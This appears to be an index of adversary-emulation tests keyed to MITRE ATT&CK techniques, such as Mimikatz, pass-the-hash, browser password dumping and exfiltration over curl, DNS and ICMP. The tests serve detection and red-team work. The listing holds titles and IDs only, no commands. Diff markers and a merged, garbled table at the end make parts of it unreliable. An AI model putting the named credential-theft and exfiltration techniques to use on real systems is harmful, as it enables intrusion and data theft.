execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -1038,68 +623,33 @@ execution,T1059.001,PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-
execution,T1059.001,PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
execution,T1059.001,PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Unix Shell,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Unix Shell,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1021.001,Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Desktop Protocol,2,RDP to Server,7382a43e-f19c-46be-8f09-5c63af7d3e2b,powershell
lateral-movement,T1021.001,Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Desktop Protocol,4,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
@@ -1121,60 +671,58 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1090.003,Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1090.003,Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1048.002,Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1048.002,Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
initial-access,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access privilege-escalation T1003.008 T1546.004 /etc/passwd and /etc/shadow .bash_profile and .bashrc 1 Access /etc/shadow (Local) Add command to .bash_profile 3723ab77-c546-403c-8fb4-bb577033b235 94500ae1-7e31-47e3-886b-c328da46872f bash sh
3 credential-access privilege-escalation T1003.008 T1546.004 /etc/passwd and /etc/shadow .bash_profile and .bashrc 2 Access /etc/passwd (Local) Add command to .bashrc 60e860b6-8ae6-49db-ad07-5e73edd88f5d 0a898315-4cfa-4007-bafe-33a4646d115f sh
credential-access T1003.008 /etc/passwd and /etc/shadow 3 Access /etc/{shadow,passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a bash
credential-access T1003.008 /etc/passwd and /etc/shadow 4 Access /etc/{shadow,passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 bash
credential-access T1558.004 AS-REP Roasting 1 Rubeus asreproast 615bd568-2859-41b5-9aed-61f6a88e48dd powershell
credential-access T1558.004 AS-REP Roasting 2 Get-DomainUser with PowerView d6139549-7b72-4e48-9ea1-324fc9bdf88a powershell
credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
credential-access T1003.005 Cached Domain Credentials 1 Cached Credential Dump via Cmdkey 56506854-89d6-46a3-9804-b7fde90791f9 command_prompt
credential-access T1552.007 Container API 1 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
credential-access T1552.007 Container API 2 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
credential-access T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
credential-access T1110.004 Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
credential-access T1110.004 Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
credential-access T1552.001 Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
credential-access T1552.001 Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
credential-access T1552.001 Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
credential-access T1555 Credentials from Password Stores 4 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] 36753ded-e5c4-4eb5-bc3c-e8fba236878d powershell
credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
credential-access T1555.003 Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
credential-access T1555.003 Credentials from Web Browsers 5 Simulating access to Opera Login Data 28498c17-57e4-495a-b0be-cc1e36de408b powershell
credential-access T1555.003 Credentials from Web Browsers 6 Simulating access to Windows Firefox Login Data eb8da98a-2e16-4551-b3dd-83de49baa14c powershell
credential-access T1555.003 Credentials from Web Browsers 7 Simulating access to Windows Edge Login Data a6a5ec26-a2d1-4109-9d35-58b867689329 powershell
credential-access T1555.003 Credentials from Web Browsers 8 Decrypt Mozilla Passwords with Firepwd.py dc9cd677-c70f-4df5-bd1c-f114af3c2381 powershell
credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
credential-access T1003.006 DCSync 2 Run DSInternals Get-ADReplAccount a0bced08-3fc5-4d8b-93b7-e8344739376e powershell
credential-access T1187 Forced Authentication 1 PetitPotam 485ce873-2e65-4706-9c7e-ae3ab9e14213 powershell
credential-access T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
credential-access T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
credential-access T1558.001 Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
credential-access T1558.001 Golden Ticket 2 Crafting Active Directory golden tickets with Rubeus e42d33cd-205c-4acf-ab59-a9f38f6bad9c powershell
credential-access T1552.006 Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
credential-access T1552.006 Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
credential-access T1558.003 Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
credential-access T1558.003 Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
credential-access T1558.003 Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
credential-access T1558.003 Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
